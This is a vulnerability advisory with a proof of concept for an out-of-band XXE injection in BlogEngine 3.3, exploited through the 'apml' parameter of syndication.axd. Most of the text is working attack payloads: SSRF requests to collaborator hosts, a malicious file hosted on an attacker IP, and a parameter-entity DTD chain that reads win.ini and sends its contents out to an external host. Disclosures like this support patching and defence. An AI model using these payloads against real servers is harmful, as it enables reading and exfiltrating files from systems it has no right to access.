BlogEngine 3.3 XML Injection

`Name: XML External Entity Injection (OOB) Vulnerability in BlogEngine 3.3  
Affected Software: BlogEngine  
Affected Versions: 3.3  
Homepage: https://blogengine.io/  
Vulnerability: XML External Entity (XXE OOB) Injection Vulnerability  
Severity: High  
Status: Fixed  
Author: Daniel Martinez Adan (aDoN90)  
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H  
  
Technical Details  
--------------------  
  
Url: http://websiteurl-blogengine3.3/syndication.axd  
Parameter Name: apml  
Parameter Type: GET  
  
*Attack Pattern 1 (SSRF HTTP Interaction) :*  
  
http://websiteurl-blogengine3.3/syndication.axd?apml=http://hav4zt9bu9ihxzvcg59lqfapzg5it7.burpcollaborator.net  
  
*Attack Pattern 2 (SSRF to XXE HTTP Interaction):*  
  
http://b5baa301-b569-4bbf-afd9-d2eb264fdcbf.gdsdemo.com/blog/syndication.axd?apml=http://attackerip:8000/miau.txt  
  
miau.txt  
  
-----------------------------  
<!DOCTYPE foo SYSTEM "  
">http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net">  
<http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net/>  
-----------------------------  
[image: image.png]  
  
*Attack Pattern 3 (SSRF to XXE Exfiltration):*  
  
miau.txt  
  
-----------------------------  
  
<?xml version="1.0" ?>  
<!DOCTYPE r [  
<!ELEMENT r ANY >  
<!ENTITY % sp SYSTEM "http://37.187.112.19:8000/test1.dtd">  
  
%sp;  
%param1;  
%exfil;  
]>  
-----------------------------  
test1.dtd  
  
-----------------------------  
  
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">  
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM '  
http://y76a7hgbrccuyclwxwcp3br74yayyn.burpcollaborator.net/?%data;'>">  
  
-----------------------------  
  
[image: image.png]  
  
  
Regards,  
adon90  
`